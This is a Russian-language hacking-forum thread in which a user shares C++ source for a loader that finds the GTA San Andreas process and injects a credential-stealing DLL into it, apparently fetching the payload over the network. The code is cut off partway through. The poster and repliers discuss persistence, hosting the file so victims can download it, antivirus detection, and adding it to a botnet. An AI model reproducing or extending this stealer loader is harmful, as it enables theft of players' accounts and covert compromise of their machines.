ANTICHAT - .exe загрузчик стиллера

ANTICHAT (https://forum.antichat.xyz/index.php)

- С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby (https://forum.antichat.xyz/forumdisplay.php?f=24)

- - .exe загрузчик стиллера (https://forum.antichat.xyz/showthread.php?t=1334135)

Тема создана в целях познания. Делал чисто из-за того, чтобы получить опыт.

Сделал .exe загрузчик стиллера, который следит за процессом гта са и если таковой имеется, вшивает туда стиллер.

C++:

[CODE]
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//Library needed by Linker to check file existance
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "WinInet.lib")
#pragma comment (lib, "urlmon.lib")
using
namespace
std
;
DWORD
GetProcId
(
const
wchar_t
*
procname
)
{
PROCESSENTRY32 pe
;
HANDLE hSnap
;
pe
.
dwSize
=
sizeof
(
PROCESSENTRY32
)
;
hSnap
=
CreateToolhelp32Snapshot
(
TH32CS_SNAPPROCESS
,
NULL
)
;
if
(
Process32First
(
hSnap
,
&
pe
)
)
{
do
{
if
(
wcscmp
(
pe
.
szExeFile
,
procname
)
==
0
)
return
pe
.
th32ProcessID
;
;
}
while
(
Process32Next
(
hSnap
,
&
pe
)
)
;
}
return
(
DWORD
)
0
;
}
bool
InjectDLL
(
const
int
&
pid
,
const
string
&
DLL_Path
)
{
long
dll_size
=
DLL_Path
.
length
(
)
+
1
;
HANDLE hProc
=
OpenProcess
(
PROCESS_ALL_ACCESS
,
FALSE
,
pid
)
;
if
(
hProc
==
NULL
)
{
cerr

Палится антистиллером от даркпискеля. Плюсы здесь в том, что стиллер работает на чистой gta_sa без всяких asi_loader, sampfuncs. Еще плюс в том, что если юзер снесет гта и поставит заново, стиллер продолжит работать. Плюс отправляет логи уже после того, как юзер закрывает гта. Также модернизировал немного паблик аси стиллер, чтобы логи складировал в txt файл и удалил лишнюю шнягу. Исходники тоже могу скинуть, кому интересно. Работает на R1/R2. Для R3 оффсеты не смог извлечь из игры т.к я баран.

P.S Не мешало бы доделать, чтобы он прятался тоже где-то в temp папке и сам себя добавил в автозагрузку

P.S.S И вообще, можно ведь сделать .exe стиллер не вшивая .asi стиллер в игру, а напрямую взаимодействуя с процессом

Вопрос к знающим, если я записываю путь к temp папке в char, а не WCHAR, значит ли это, что если у юзера в пути к temp папке содержатся русские символы, то будет беда?

Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo

Кстати, rghost заблокирован в России. Файл не будет загружаться.

Цитата:

Сообщение от Pakulichev

Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo
Кстати, rghost заблокирован в России. Файл не будет загружаться.

это прототип, логирование для дебага

Нормас, добавлю в свой ботнет :)

Цитата:

Сообщение от Pakulichev

Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo
Кстати, rghost заблокирован в России. Файл не будет загружаться.

VPN в помощь

Цитата:

Сообщение от osminog

VPN в помощь

Я про то, что жертва не сможет скачать файл

Цитата:

Сообщение от Pakulichev

Я про то, что жертва не сможет скачать файл

Тут не обязательно юзать rghost, можешь хоть со своего сервака грузить

вирустотал ахуевает от этого?

Цитата:

Сообщение от social enemy

вирустотал ахуевает от этого?

вирус тотал будет от любого файла ахуевать... если юзеры будут лить их туда

в теме ошибка, это не exe стиллер, а лоадер.

Цитата:

Сообщение от ALF

ну не напишет же читу он stealler